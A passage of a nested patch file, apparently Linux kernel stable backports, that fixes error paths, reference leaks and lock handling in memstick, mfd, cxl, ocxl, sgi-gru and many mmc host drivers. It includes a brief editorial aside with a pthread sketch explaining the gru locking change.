++	 * the sanity check in dma_mmap_coherent().
+ 	 */
+ 	vma->vm_pgoff = 0;
+-
+-	retval = vm_iomap_memory(vma, mem->dma_handle, mem->size);
++	retval = dma_mmap_coherent(q->dev, vma, mem->vaddr, mem->dma_handle,
++				   mem->size);
+ 	if (retval) {
+ 		dev_err(q->dev, "mmap: remap failed with error %d. ",
+ 			retval);
+diff --git a/drivers/memory/renesas-rpc-if.c b/drivers/memory/renesas-rpc-if.c
+index 4316988d791a5..61c288d403750 100644
+--- a/drivers/memory/renesas-rpc-if.c
++++ b/drivers/memory/renesas-rpc-if.c
+@@ -317,6 +317,9 @@ int rpcif_hw_init(struct rpcif *rpc, bool hyperflash)
+ 	regmap_update_bits(rpc->regmap, RPCIF_PHYCNT, RPCIF_PHYCNT_PHYMEM_MASK,
+ 			   RPCIF_PHYCNT_PHYMEM(hyperflash ? 3 : 0));
+ 
++	/* DMA Transfer is not supported */
++	regmap_update_bits(rpc->regmap, RPCIF_PHYCNT, RPCIF_PHYCNT_HS, 0);
++
+ 	if (rpc->type == RPCIF_RCAR_GEN3)
+ 		regmap_update_bits(rpc->regmap, RPCIF_PHYCNT,
+ 				   RPCIF_PHYCNT_STRTIM(7), RPCIF_PHYCNT_STRTIM(7));
+diff --git a/drivers/memstick/core/ms_block.c b/drivers/memstick/core/ms_block.c
+index ba84145195158..04115cd92433b 100644
+--- a/drivers/memstick/core/ms_block.c
++++ b/drivers/memstick/core/ms_block.c
+@@ -2116,6 +2116,11 @@ static int msb_init_disk(struct memstick_dev *card)
+ 	dbg("Set total disk size to %lu sectors", capacity);
+ 
+ 	msb->io_queue = alloc_ordered_workqueue("ms_block", WQ_MEM_RECLAIM);
++	if (!msb->io_queue) {
++		rc = -ENOMEM;
++		goto out_cleanup_disk;
++	}
++
+ 	INIT_WORK(&msb->io_work, msb_io_work);
+ 	sg_init_table(msb->prealloc_sg, MS_BLOCK_MAX_SEGS+1);
+ 
+@@ -2125,10 +2130,12 @@ static int msb_init_disk(struct memstick_dev *card)
+ 	msb_start(card);
+ 	rc = device_add_disk(&card->dev, msb->disk, NULL);
+ 	if (rc)
+-		goto out_cleanup_disk;
++		goto out_destroy_workqueue;
+ 	dbg("Disk added");
+ 	return 0;
+ 
++out_destroy_workqueue:
++	destroy_workqueue(msb->io_queue);
+ out_cleanup_disk:
+ 	put_disk(msb->disk);
+ out_free_tag_set:
+diff --git a/drivers/mfd/Kconfig b/drivers/mfd/Kconfig
+index 8b93856de432a..9940e2724c05d 100644
+--- a/drivers/mfd/Kconfig
++++ b/drivers/mfd/Kconfig
+@@ -2027,6 +2027,7 @@ config MFD_ROHM_BD957XMUF
+ 	depends on I2C=y
+ 	depends on OF
+ 	select REGMAP_I2C
++	select REGMAP_IRQ
+ 	select MFD_CORE
+ 	help
+ 	  Select this option to get support for the ROHM BD9576MUF and
+diff --git a/drivers/mfd/axp20x.c b/drivers/mfd/axp20x.c
+index 88a212a8168cf..880c41fa7021b 100644
+--- a/drivers/mfd/axp20x.c
++++ b/drivers/mfd/axp20x.c
+@@ -842,7 +842,7 @@ static void axp20x_power_off(void)
+ 		     AXP20X_OFF);
+ 
+ 	/* Give capacitors etc. time to drain to avoid kernel panic msg. */
+-	msleep(500);
++	mdelay(500);
+ }
+ 
+ int axp20x_match_device(struct axp20x_dev *axp20x)
+diff --git a/drivers/mfd/qcom-pm8008.c b/drivers/mfd/qcom-pm8008.c
+index 4b8ff947762f2..9f3c4a01b4c1c 100644
+--- a/drivers/mfd/qcom-pm8008.c
++++ b/drivers/mfd/qcom-pm8008.c
+@@ -215,8 +215,8 @@ static int pm8008_probe(struct i2c_client *client)
+ 
+ 	dev = &client->dev;
+ 	regmap = devm_regmap_init_i2c(client, &qcom_mfd_regmap_cfg);
+-	if (!regmap)
+-		return -ENODEV;
++	if (IS_ERR(regmap))
++		return PTR_ERR(regmap);
+ 
+ 	i2c_set_clientdata(client, regmap);
+ 
+diff --git a/drivers/mfd/qcom_rpm.c b/drivers/mfd/qcom_rpm.c
+index 71bc34b74bc9c..8fea0e511550a 100644
+--- a/drivers/mfd/qcom_rpm.c
++++ b/drivers/mfd/qcom_rpm.c
+@@ -547,7 +547,7 @@ static int qcom_rpm_probe(struct platform_device *pdev)
+ 	init_completion(&rpm->ack);
+ 
+ 	/* Enable message RAM clock */
+-	rpm->ramclk = devm_clk_get(&pdev->dev, "ram");
++	rpm->ramclk = devm_clk_get_enabled(&pdev->dev, "ram");
+ 	if (IS_ERR(rpm->ramclk)) {
+ 		ret = PTR_ERR(rpm->ramclk);
+ 		if (ret == -EPROBE_DEFER)
+@@ -558,7 +558,6 @@ static int qcom_rpm_probe(struct platform_device *pdev)
+ 		 */
+ 		rpm->ramclk = NULL;
+ 	}
+-	clk_prepare_enable(rpm->ramclk); /* Accepts NULL */
+ 
+ 	irq_ack = platform_get_irq_byname(pdev, "ack");
+ 	if (irq_ack < 0)
+@@ -673,22 +672,11 @@ static int qcom_rpm_probe(struct platform_device *pdev)
+ 	if (ret)
+ 		dev_warn(&pdev->dev, "failed to mark wakeup irq as wakeup\n");
+ 
+-	return of_platform_populate(pdev->dev.of_node, NULL, NULL, &pdev->dev);
+-}
+-
+-static int qcom_rpm_remove(struct platform_device *pdev)
+-{
+-	struct qcom_rpm *rpm = dev_get_drvdata(&pdev->dev);
+-
+-	of_platform_depopulate(&pdev->dev);
+-	clk_disable_unprepare(rpm->ramclk);
+-
+-	return 0;
++	return devm_of_platform_populate(&pdev->dev);
+ }
+ 
+ static struct platform_driver qcom_rpm_driver = {
+ 	.probe = qcom_rpm_probe,
+-	.remove = qcom_rpm_remove,
+ 	.driver  = {
+ 		.name  = "qcom_rpm",
+ 		.of_match_table = qcom_rpm_of_match,
+diff --git a/drivers/misc/cxl/guest.c b/drivers/misc/cxl/guest.c
+index 375f692ae9d68..fb95a2d5cef48 100644
+--- a/drivers/misc/cxl/guest.c
++++ b/drivers/misc/cxl/guest.c
+@@ -965,10 +965,10 @@ int cxl_guest_init_afu(struct cxl *adapter, int slice, struct device_node *afu_n
+ 	 * if it returns an error!
+ 	 */
+ 	if ((rc = cxl_register_afu(afu)))
+-		goto err_put1;
++		goto err_put_dev;
+ 
+ 	if ((rc = cxl_sysfs_afu_add(afu)))
+-		goto err_put1;
++		goto err_del_dev;
+ 
+ 	/*
+ 	 * pHyp doesn't expose the programming models supported by the
+@@ -984,7 +984,7 @@ int cxl_guest_init_afu(struct cxl *adapter, int slice, struct device_node *afu_n
+ 		afu->modes_supported = CXL_MODE_DIRECTED;
+ 
+ 	if ((rc = cxl_afu_select_best_mode(afu)))
+-		goto err_put2;
++		goto err_remove_sysfs;
+ 
+ 	adapter->afu[afu->slice] = afu;
+ 
+@@ -1004,10 +1004,12 @@ int cxl_guest_init_afu(struct cxl *adapter, int slice, struct device_node *afu_n
+ 
+ 	return 0;
+ 
+-err_put2:
++err_remove_sysfs:
+ 	cxl_sysfs_afu_remove(afu);
+-err_put1:
+-	device_unregister(&afu->dev);
++err_del_dev:
++	device_del(&afu->dev);
++err_put_dev:
++	put_device(&afu->dev);
+ 	free = false;
+ 	guest_release_serr_irq(afu);
+ err2:
+@@ -1141,18 +1143,20 @@ struct cxl *cxl_guest_init_adapter(struct device_node *np, struct platform_devic
+ 	 * even if it returns an error!
+ 	 */
+ 	if ((rc = cxl_register_adapter(adapter)))
+-		goto err_put1;
++		goto err_put_dev;
+ 
+ 	if ((rc = cxl_sysfs_adapter_add(adapter)))
+-		goto err_put1;
++		goto err_del_dev;
+ 
+ 	/* release the context lock as the adapter is configured */
+ 	cxl_adapter_context_unlock(adapter);
+ 
+ 	return adapter;
+ 
+-err_put1:
+-	device_unregister(&adapter->dev);
++err_del_dev:
++	device_del(&adapter->dev);
++err_put_dev:
++	put_device(&adapter->dev);
+ 	free = false;
+ 	cxl_guest_remove_chardev(adapter);
+ err1:
+diff --git a/drivers/misc/cxl/pci.c b/drivers/misc/cxl/pci.c
+index 3de0aea62ade4..0ff944860dda9 100644
+--- a/drivers/misc/cxl/pci.c
++++ b/drivers/misc/cxl/pci.c
+@@ -387,6 +387,7 @@ int cxl_calc_capp_routing(struct pci_dev *dev, u64 *chipid,
+ 	rc = get_phb_index(np, phb_index);
+ 	if (rc) {
+ 		pr_err("cxl: invalid phb index\n");
++		of_node_put(np);
+ 		return rc;
+ 	}
+ 
+@@ -1164,10 +1165,10 @@ static int pci_init_afu(struct cxl *adapter, int slice, struct pci_dev *dev)
+ 	 * if it returns an error!
+ 	 */
+ 	if ((rc = cxl_register_afu(afu)))
+-		goto err_put1;
++		goto err_put_dev;
+ 
+ 	if ((rc = cxl_sysfs_afu_add(afu)))
+-		goto err_put1;
++		goto err_del_dev;
+ 
+ 	adapter->afu[afu->slice] = afu;
+ 
+@@ -1176,10 +1177,12 @@ static int pci_init_afu(struct cxl *adapter, int slice, struct pci_dev *dev)
+ 
+ 	return 0;
+ 
+-err_put1:
++err_del_dev:
++	device_del(&afu->dev);
++err_put_dev:
+ 	pci_deconfigure_afu(afu);
+ 	cxl_debugfs_afu_remove(afu);
+-	device_unregister(&afu->dev);
++	put_device(&afu->dev);
+ 	return rc;
+ 
+ err_free_native:
+@@ -1667,23 +1670,25 @@ static struct cxl *cxl_pci_init_adapter(struct pci_dev *dev)
+ 	 * even if it returns an error!
+ 	 */
+ 	if ((rc = cxl_register_adapter(adapter)))
+-		goto err_put1;
++		goto err_put_dev;
+ 
+ 	if ((rc = cxl_sysfs_adapter_add(adapter)))
+-		goto err_put1;
++		goto err_del_dev;
+ 
+ 	/* Release the context lock as adapter is configured */
+ 	cxl_adapter_context_unlock(adapter);
+ 
+ 	return adapter;
+ 
+-err_put1:
++err_del_dev:
++	device_del(&adapter->dev);
++err_put_dev:
+ 	/* This should mirror cxl_remove_adapter, except without the
+ 	 * sysfs parts
+ 	 */
+ 	cxl_debugfs_adapter_remove(adapter);
+ 	cxl_deconfigure_adapter(adapter);
+-	device_unregister(&adapter->dev);
++	put_device(&adapter->dev);
+ 	return ERR_PTR(rc);
+ 
+ err_release:
+diff --git a/drivers/misc/habanalabs/common/firmware_if.c b/drivers/misc/habanalabs/common/firmware_if.c
+index 2de6a9bd564de..f18e53bbba6bb 100644
+--- a/drivers/misc/habanalabs/common/firmware_if.c
++++ b/drivers/misc/habanalabs/common/firmware_if.c
+@@ -2983,7 +2983,7 @@ static int hl_fw_get_sec_attest_data(struct hl_device *hdev, u32 packet_id, void
+ 	int rc;
+ 
+ 	req_cpu_addr = hl_cpu_accessible_dma_pool_alloc(hdev, size, &req_dma_addr);
+-	if (!data) {
++	if (!req_cpu_addr) {
+ 		dev_err(hdev->dev,
+ 			"Failed to allocate DMA memory for CPU-CP packet %u\n", packet_id);
+ 		return -ENOMEM;
+diff --git a/drivers/misc/lkdtm/cfi.c b/drivers/misc/lkdtm/cfi.c
+index 5245cf6013c95..fc28714ae3a61 100644
+--- a/drivers/misc/lkdtm/cfi.c
++++ b/drivers/misc/lkdtm/cfi.c
+@@ -54,7 +54,11 @@ static void lkdtm_CFI_FORWARD_PROTO(void)
+ # ifdef CONFIG_ARM64_BTI_KERNEL
+ #  define __no_pac             "branch-protection=bti"
+ # else
+-#  define __no_pac             "branch-protection=none"
++#  ifdef CONFIG_CC_HAS_BRANCH_PROT_PAC_RET
++#   define __no_pac            "branch-protection=none"
++#  else
++#   define __no_pac            "sign-return-address=none"
++#  endif
+ # endif
+ # define __no_ret_protection   __noscs __attribute__((__target__(__no_pac)))
+ #else
+diff --git a/drivers/misc/ocxl/config.c b/drivers/misc/ocxl/config.c
+index e401a51596b9c..92ab49705f645 100644
+--- a/drivers/misc/ocxl/config.c
++++ b/drivers/misc/ocxl/config.c
+@@ -193,6 +193,18 @@ static int read_dvsec_vendor(struct pci_dev *dev)
+ 	return 0;
+ }
+ 
++/**
++ * get_dvsec_vendor0() - Find a related PCI device (function 0)
++ * @dev: PCI device to match
++ * @dev0: The PCI device (function 0) found
++ * @out_pos: The position of PCI device (function 0)
++ *
++ * Returns 0 on success, negative on failure.
++ *
++ * NOTE: If it's successful, the reference of dev0 is increased,
++ * so after using it, the callers must call pci_dev_put() to give
++ * up the reference.
++ */
+ static int get_dvsec_vendor0(struct pci_dev *dev, struct pci_dev **dev0,
+ 			     int *out_pos)
+ {
+@@ -202,10 +214,14 @@ static int get_dvsec_vendor0(struct pci_dev *dev, struct pci_dev **dev0,
+ 		dev = get_function_0(dev);
+ 		if (!dev)
+ 			return -1;
++	} else {
++		dev = pci_dev_get(dev);
+ 	}
+ 	pos = find_dvsec(dev, OCXL_DVSEC_VENDOR_ID);
+-	if (!pos)
++	if (!pos) {
++		pci_dev_put(dev);
+ 		return -1;
++	}
+ 	*dev0 = dev;
+ 	*out_pos = pos;
+ 	return 0;
+@@ -222,6 +238,7 @@ int ocxl_config_get_reset_reload(struct pci_dev *dev, int *val)
+ 
+ 	pci_read_config_dword(dev0, pos + OCXL_DVSEC_VENDOR_RESET_RELOAD,
+ 			      &reset_reload);
++	pci_dev_put(dev0);
+ 	*val = !!(reset_reload & BIT(0));
+ 	return 0;
+ }
+@@ -243,6 +260,7 @@ int ocxl_config_set_reset_reload(struct pci_dev *dev, int val)
+ 		reset_reload &= ~BIT(0);
+ 	pci_write_config_dword(dev0, pos + OCXL_DVSEC_VENDOR_RESET_RELOAD,
+ 			       reset_reload);
++	pci_dev_put(dev0);
+ 	return 0;
+ }
+ 
+diff --git a/drivers/misc/ocxl/file.c b/drivers/misc/ocxl/file.c
+index d46dba2df5a10..452d5777a0e4c 100644
+--- a/drivers/misc/ocxl/file.c
++++ b/drivers/misc/ocxl/file.c
+@@ -541,8 +541,11 @@ int ocxl_file_register_afu(struct ocxl_afu *afu)
+ 		goto err_put;
+ 
+ 	rc = device_register(&info->dev);
+-	if (rc)
+-		goto err_put;
++	if (rc) {
++		free_minor(info);
++		put_device(&info->dev);
++		return rc;
++	}
+ 
+ 	rc = ocxl_sysfs_register_afu(info);
+ 	if (rc)
+diff --git a/drivers/misc/sgi-gru/grufault.c b/drivers/misc/sgi-gru/grufault.c
+index d7ef61e602ede..b836936e97471 100644
+--- a/drivers/misc/sgi-gru/grufault.c
++++ b/drivers/misc/sgi-gru/grufault.c
+@@ -648,6 +648,7 @@ int gru_handle_user_call_os(unsigned long cb)
+ 	if ((cb & (GRU_HANDLE_STRIDE - 1)) || ucbnum >= GRU_NUM_CB)
+ 		return -EINVAL;
+ 
++again:
+ 	gts = gru_find_lock_gts(cb);
+ 	if (!gts)
+ 		return -EINVAL;
+@@ -656,7 +657,11 @@ int gru_handle_user_call_os(unsigned long cb)
+ 	if (ucbnum >= gts->ts_cbr_au_count * GRU_CBR_AU_SIZE)
+ 		goto exit;
+ 
+-	gru_check_context_placement(gts);
++	if (gru_check_context_placement(gts)) {
++		gru_unlock_gts(gts);
++		gru_unload_context(gts, 1);
++		goto again;
++	}
+ 
+ 	/*
+ 	 * CCH may contain stale data if ts_force_cch_reload is set.
+@@ -874,7 +879,11 @@ int gru_set_context_option(unsigned long arg)
+ 		} else {
+ 			gts->ts_user_blade_id = req.val1;
+ 			gts->ts_user_chiplet_id = req.val0;
+-			gru_check_context_placement(gts);
++			if (gru_check_context_placement(gts)) {
++				gru_unlock_gts(gts);
++				gru_unload_context(gts, 1);
++				return ret;
++			}
+ 		}
+ 		break;
+ 	case sco_gseg_owner:
+diff --git a/drivers/misc/sgi-gru/grumain.c b/drivers/misc/sgi-gru/grumain.c
+index 6706ef3c59776..4eb4b94551390 100644
+--- a/drivers/misc/sgi-gru/grumain.c
++++ b/drivers/misc/sgi-gru/grumain.c
+@@ -716,9 +716,10 @@ static int gru_check_chiplet_assignment(struct gru_state *gru,
+  * chiplet. Misassignment can occur if the process migrates to a different
+  * blade or if the user changes the selected blade/chiplet.
+  */
+-void gru_check_context_placement(struct gru_thread_state *gts)
++int gru_check_context_placement(struct gru_thread_state *gts)
+ {
+ 	struct gru_state *gru;
++	int ret = 0;
+ 
+ 	/*
+ 	 * If the current task is the context owner, verify that the
+@@ -726,15 +727,23 @@ void gru_check_context_placement(struct gru_thread_state *gts)
+ 	 * references. Pthread apps use non-owner references to the CBRs.
+ 	 */
+ 	gru = gts->ts_gru;
++	/*
++	 * If gru or gts->ts_tgid_owner isn't initialized properly, return
++	 * success to indicate that the caller does not need to unload the
++	 * gru context. The caller is responsible for inspecting and
++	 * reinitializing them if needed.
++	 */
+ 	if (!gru || gts->ts_tgid_owner != current->tgid)
+-		return;
++		return ret;
+ 
+ 	if (!gru_check_chiplet_assignment(gru, gts)) {
+ 		STAT(check_context_unload);
+-		gru_unload_context(gts, 1);
++		ret = -EINVAL;
+ 	} else if (gru_retarget_intr(gts)) {
+ 		STAT(check_context_retarget_intr);
+ 	}
++
++	return ret;
+ }
+ 
+ 
+@@ -934,7 +943,12 @@ again:
+ 	mutex_lock(&gts->ts_ctxlock);
+ 	preempt_disable();
+ 
+-	gru_check_context_placement(gts);
++	if (gru_check_context_placement(gts)) {
++		preempt_enable();
++		mutex_unlock(&gts->ts_ctxlock);
++		gru_unload_context(gts, 1);
++		return VM_FAULT_NOPAGE;
++	}
+ 
+ 	if (!gts->ts_gru) {
+ 		STAT(load_user_context);
+diff --git a/drivers/misc/sgi-gru/grutables.h b/drivers/misc/sgi-gru/grutables.h
+index 8c52776db2341..640daf1994df7 100644
+--- a/drivers/misc/sgi-gru/grutables.h
++++ b/drivers/misc/sgi-gru/grutables.h
+@@ -632,7 +632,7 @@ extern int gru_user_flush_tlb(unsigned long arg);
+ extern int gru_user_unload_context(unsigned long arg);
+ extern int gru_get_exception_detail(unsigned long arg);
+ extern int gru_set_context_option(unsigned long address);
+-extern void gru_check_context_placement(struct gru_thread_state *gts);
++extern int gru_check_context_placement(struct gru_thread_state *gts);
+ extern int gru_cpu_fault_map_id(void);
+ extern struct vm_area_struct *gru_find_vma(unsigned long vaddr);
+ extern void gru_flush_all_tlb(struct gru_state *gru);
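
[Editorial aside, not part of the patch] gru_check_context_placement() now only reports misplacement; its callers drop the gts lock first and then call gru_unload_context(), avoiding teardown while the lock is held. A hedged pthread sketch of the decide-under-lock, act-after-unlock shape (compile with -pthread):

/* Decide under the lock, tear down after unlock; sketch only. */
#include <pthread.h>
#include <stdio.h>

static pthread_mutex_t gts_lock = PTHREAD_MUTEX_INITIALIZER;
static int misplaced = 1;	/* pretend the context is on the wrong chiplet */

static int check_placement(void)
{
	/* Runs with gts_lock held: report only, never unload here. */
	return misplaced ? -1 : 0;
}

static void unload_context(void)
{
	/* Heavy teardown that must not run under gts_lock. */
	puts("context unloaded");
}

int main(void)
{
	int bad;

	pthread_mutex_lock(&gts_lock);
	bad = check_placement();
	pthread_mutex_unlock(&gts_lock);

	if (bad)
		unload_context();
	return 0;
}
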
+diff --git a/drivers/misc/tifm_7xx1.c b/drivers/misc/tifm_7xx1.c
+index 017c2f7d62871..7dd86a9858aba 100644
+--- a/drivers/misc/tifm_7xx1.c
++++ b/drivers/misc/tifm_7xx1.c
+@@ -190,7 +190,7 @@ static void tifm_7xx1_switch_media(struct work_struct *work)
+ 				spin_unlock_irqrestore(&fm->lock, flags);
+ 			}
+ 			if (sock)
+-				tifm_free_device(&sock->dev);
++				put_device(&sock->dev);
+ 		}
+ 		spin_lock_irqsave(&fm->lock, flags);
+ 	}
+diff --git a/drivers/mmc/core/sd.c b/drivers/mmc/core/sd.c
+index 3662bf5320ce5..72b664ed90cf6 100644
+--- a/drivers/mmc/core/sd.c
++++ b/drivers/mmc/core/sd.c
+@@ -1259,7 +1259,7 @@ static int sd_read_ext_regs(struct mmc_card *card)
+ 	 */
+ 	err = sd_read_ext_reg(card, 0, 0, 0, 512, gen_info_buf);
+ 	if (err) {
+-		pr_warn("%s: error %d reading general info of SD ext reg\n",
++		pr_err("%s: error %d reading general info of SD ext reg\n",
+ 			mmc_hostname(card->host), err);
+ 		goto out;
+ 	}
+@@ -1273,7 +1273,12 @@ static int sd_read_ext_regs(struct mmc_card *card)
+ 	/* Number of extensions to be find. */
+ 	num_ext = gen_info_buf[4];
+ 
+-	/* We support revision 0, but limit it to 512 bytes for simplicity. */
++	/*
++	 * We only support revision 0 and limit it to 512 bytes for simplicity.
++	 * No matter what, let's return zero to allow us to continue using the
++	 * card, even if we can't support the features from the SD function
++	 * extensions registers.
++	 */
+ 	if (rev != 0 || len > 512) {
+ 		pr_warn("%s: non-supported SD ext reg layout\n",
+ 			mmc_hostname(card->host));
+@@ -1288,7 +1293,7 @@ static int sd_read_ext_regs(struct mmc_card *card)
+ 	for (i = 0; i < num_ext; i++) {
+ 		err = sd_parse_ext_reg(card, gen_info_buf, &next_ext_addr);
+ 		if (err) {
+-			pr_warn("%s: error %d parsing SD ext reg\n",
++			pr_err("%s: error %d parsing SD ext reg\n",
+ 				mmc_hostname(card->host), err);
+ 			goto out;
+ 		}
+diff --git a/drivers/mmc/host/alcor.c b/drivers/mmc/host/alcor.c
+index bfb8efeb7eb80..d01df01d4b4d1 100644
+--- a/drivers/mmc/host/alcor.c
++++ b/drivers/mmc/host/alcor.c
+@@ -1114,7 +1114,10 @@ static int alcor_pci_sdmmc_drv_probe(struct platform_device *pdev)
+ 	alcor_hw_init(host);
+ 
+ 	dev_set_drvdata(&pdev->dev, host);
+-	mmc_add_host(mmc);
++	ret = mmc_add_host(mmc);
++	if (ret)
++		goto free_host;
++
+ 	return 0;
+ 
+ free_host:
+diff --git a/drivers/mmc/host/atmel-mci.c b/drivers/mmc/host/atmel-mci.c
+index 91d52ba7a39fc..bb9bbf1c927b6 100644
+--- a/drivers/mmc/host/atmel-mci.c
++++ b/drivers/mmc/host/atmel-mci.c
+@@ -2222,6 +2222,7 @@ static int atmci_init_slot(struct atmel_mci *host,
+ {
+ 	struct mmc_host			*mmc;
+ 	struct atmel_mci_slot		*slot;
++	int ret;
+ 
+ 	mmc = mmc_alloc_host(sizeof(struct atmel_mci_slot), &host->pdev->dev);
+ 	if (!mmc)
+@@ -2305,11 +2306,13 @@ static int atmci_init_slot(struct atmel_mci *host,
+ 
+ 	host->slot[id] = slot;
+ 	mmc_regulator_get_supply(mmc);
+-	mmc_add_host(mmc);
++	ret = mmc_add_host(mmc);
++	if (ret) {
++		mmc_free_host(mmc);
++		return ret;
++	}
+ 
+ 	if (gpio_is_valid(slot->detect_pin)) {
+-		int ret;
+-
+ 		timer_setup(&slot->detect_timer, atmci_detect_change, 0);
+ 
+ 		ret = request_irq(gpio_to_irq(slot->detect_pin),
+diff --git a/drivers/mmc/host/litex_mmc.c b/drivers/mmc/host/litex_mmc.c
+index 6ba0d63b8c078..39c6707fdfdbc 100644
+--- a/drivers/mmc/host/litex_mmc.c
++++ b/drivers/mmc/host/litex_mmc.c
+@@ -502,6 +502,7 @@ static int litex_mmc_irq_init(struct platform_device *pdev,
+ 
+ use_polling:
+ 	host->mmc->caps |= MMC_CAP_NEEDS_POLL;
++	host->irq = 0;
+ 	return 0;
+ }
+ 
+diff --git a/drivers/mmc/host/meson-gx-mmc.c b/drivers/mmc/host/meson-gx-mmc.c
+index df05e60bed9a2..6e5ea0213b477 100644
+--- a/drivers/mmc/host/meson-gx-mmc.c
++++ b/drivers/mmc/host/meson-gx-mmc.c
+@@ -1335,7 +1335,9 @@ static int meson_mmc_probe(struct platform_device *pdev)
+ 	}
+ 
+ 	mmc->ops = &meson_mmc_ops;
+-	mmc_add_host(mmc);
++	ret = mmc_add_host(mmc);
++	if (ret)
++		goto err_free_irq;
+ 
+ 	return 0;
+ 
+diff --git a/drivers/mmc/host/mmci.c b/drivers/mmc/host/mmci.c
+index 012aa85489d86..b9e5dfe74e5c7 100644
+--- a/drivers/mmc/host/mmci.c
++++ b/drivers/mmc/host/mmci.c
+@@ -2256,7 +2256,9 @@ static int mmci_probe(struct amba_device *dev,
+ 	pm_runtime_set_autosuspend_delay(&dev->dev, 50);
+ 	pm_runtime_use_autosuspend(&dev->dev);
+ 
+-	mmc_add_host(mmc);
++	ret = mmc_add_host(mmc);
++	if (ret)
++		goto clk_disable;
+ 
+ 	pm_runtime_put(&dev->dev);
+ 	return 0;
+diff --git a/drivers/mmc/host/moxart-mmc.c b/drivers/mmc/host/moxart-mmc.c
+index dfc3ffd5b1f8c..52ed30f2d9f4f 100644
+--- a/drivers/mmc/host/moxart-mmc.c
++++ b/drivers/mmc/host/moxart-mmc.c
+@@ -665,7 +665,9 @@ static int moxart_probe(struct platform_device *pdev)
+ 		goto out;
+ 
+ 	dev_set_drvdata(dev, mmc);
+-	mmc_add_host(mmc);
++	ret = mmc_add_host(mmc);
++	if (ret)
++		goto out;
+ 
+ 	dev_dbg(dev, "IRQ=%d, FIFO is %d bytes\n", irq, host->fifo_width);
+ 
+diff --git a/drivers/mmc/host/mxcmmc.c b/drivers/mmc/host/mxcmmc.c
+index 2cf0413407ea2..668f865f3efb0 100644
+--- a/drivers/mmc/host/mxcmmc.c
++++ b/drivers/mmc/host/mxcmmc.c
+@@ -1143,7 +1143,9 @@ static int mxcmci_probe(struct platform_device *pdev)
+ 
+ 	timer_setup(&host->watchdog, mxcmci_watchdog, 0);
+ 
+-	mmc_add_host(mmc);
++	ret = mmc_add_host(mmc);
++	if (ret)
++		goto out_free_dma;
+ 
+ 	return 0;
+ 
+diff --git a/drivers/mmc/host/omap_hsmmc.c b/drivers/mmc/host/omap_hsmmc.c
+index fca30add563e9..4bd7447552055 100644
+--- a/drivers/mmc/host/omap_hsmmc.c
++++ b/drivers/mmc/host/omap_hsmmc.c
+@@ -1946,7 +1946,9 @@ static int omap_hsmmc_probe(struct platform_device *pdev)
+ 	if (!ret)
+ 		mmc->caps |= MMC_CAP_SDIO_IRQ;
+ 
+-	mmc_add_host(mmc);
++	ret = mmc_add_host(mmc);
++	if (ret)
++		goto err_irq;
+ 
+ 	if (mmc_pdata(host)->name != NULL) {
+ 		ret = device_create_file(&mmc->class_dev, &dev_attr_slot_name);
+diff --git a/drivers/mmc/host/pxamci.c b/drivers/mmc/host/pxamci.c
+index e4003f6058eb5..2a988f942b6ca 100644
+--- a/drivers/mmc/host/pxamci.c
++++ b/drivers/mmc/host/pxamci.c
+@@ -763,7 +763,12 @@ static int pxamci_probe(struct platform_device *pdev)
+ 			dev_warn(dev, "gpio_ro and get_ro() both defined\n");
+ 	}
+ 
+-	mmc_add_host(mmc);
++	ret = mmc_add_host(mmc);
++	if (ret) {
++		if (host->pdata && host->pdata->exit)
++			host->pdata->exit(dev, mmc);
++		goto out;
++	}
+ 
+ 	return 0;
+ 
+diff --git a/drivers/mmc/host/renesas_sdhi.h b/drivers/mmc/host/renesas_sdhi.h
+index c4abfee1ebae1..e4c490729c98e 100644
+--- a/drivers/mmc/host/renesas_sdhi.h
++++ b/drivers/mmc/host/renesas_sdhi.h
+@@ -44,6 +44,7 @@ struct renesas_sdhi_quirks {
+ 	bool fixed_addr_mode;
+ 	bool dma_one_rx_only;
+ 	bool manual_tap_correction;
++	bool old_info1_layout;
+ 	u32 hs400_bad_taps;
+ 	const u8 (*hs400_calib_table)[SDHI_CALIB_TABLE_MAX];
+ };
+diff --git a/drivers/mmc/host/renesas_sdhi_core.c b/drivers/mmc/host/renesas_sdhi_core.c
+index b970699743e0a..e38d0e8b8e0ed 100644
+--- a/drivers/mmc/host/renesas_sdhi_core.c
++++ b/drivers/mmc/host/renesas_sdhi_core.c
+@@ -546,7 +546,7 @@ static void renesas_sdhi_reset_hs400_mode(struct tmio_mmc_host *host,
+ 			 SH_MOBILE_SDHI_SCC_TMPPORT2_HS400OSEL) &
+ 			sd_scc_read32(host, priv, SH_MOBILE_SDHI_SCC_TMPPORT2));
+ 
+-	if (priv->adjust_hs400_calib_table)
++	if (priv->quirks && (priv->quirks->hs400_calib_table || priv->quirks->hs400_bad_taps))
+ 		renesas_sdhi_adjust_hs400_mode_disable(host);
+ 
+ 	sd_ctrl_write16(host, CTL_SD_CARD_CLK_CTL, CLK_CTL_SCLKEN |
+@@ -1068,11 +1068,14 @@ int renesas_sdhi_probe(struct platform_device *pdev,
+ 	if (ver >= SDHI_VER_GEN3_SD)
+ 		host->get_timeout_cycles = renesas_sdhi_gen3_get_cycles;
+ 
++	/* Check for SCC so we can reset it if needed */
++	if (of_data && of_data->scc_offset && ver >= SDHI_VER_GEN2_SDR104)
++		priv->scc_ctl = host->ctl + of_data->scc_offset;
++
+ 	/* Enable tuning iff we have an SCC and a supported mode */
+-	if (of_data && of_data->scc_offset &&
+-	    (host->mmc->caps & MMC_CAP_UHS_SDR104 ||
+-	     host->mmc->caps2 & (MMC_CAP2_HS200_1_8V_SDR |
+-				 MMC_CAP2_HS400_1_8V))) {
++	if (priv->scc_ctl && (host->mmc->caps & MMC_CAP_UHS_SDR104 ||
++	    host->mmc->caps2 & (MMC_CAP2_HS200_1_8V_SDR |
++				MMC_CAP2_HS400_1_8V))) {
+ 		const struct renesas_sdhi_scc *taps = of_data->taps;
+ 		bool use_4tap = quirks && quirks->hs400_4taps;
+ 		bool hit = false;
+@@ -1092,7 +1095,6 @@ int renesas_sdhi_probe(struct platform_device *pdev,
+ 		if (!hit)
+ 			dev_warn(&host->pdev->dev, "Unknown clock rate for tuning\n");
+ 
+-		priv->scc_ctl = host->ctl + of_data->scc_offset;
+ 		host->check_retune = renesas_sdhi_check_scc_error;
+ 		host->ops.execute_tuning = renesas_sdhi_execute_tuning;
+ 		host->ops.prepare_hs400_tuning = renesas_sdhi_prepare_hs400_tuning;
+diff --git a/drivers/mmc/host/renesas_sdhi_internal_dmac.c b/drivers/mmc/host/renesas_sdhi_internal_dmac.c
+index 42937596c4c41..7c81c2680701f 100644
+--- a/drivers/mmc/host/renesas_sdhi_internal_dmac.c
++++ b/drivers/mmc/host/renesas_sdhi_internal_dmac.c
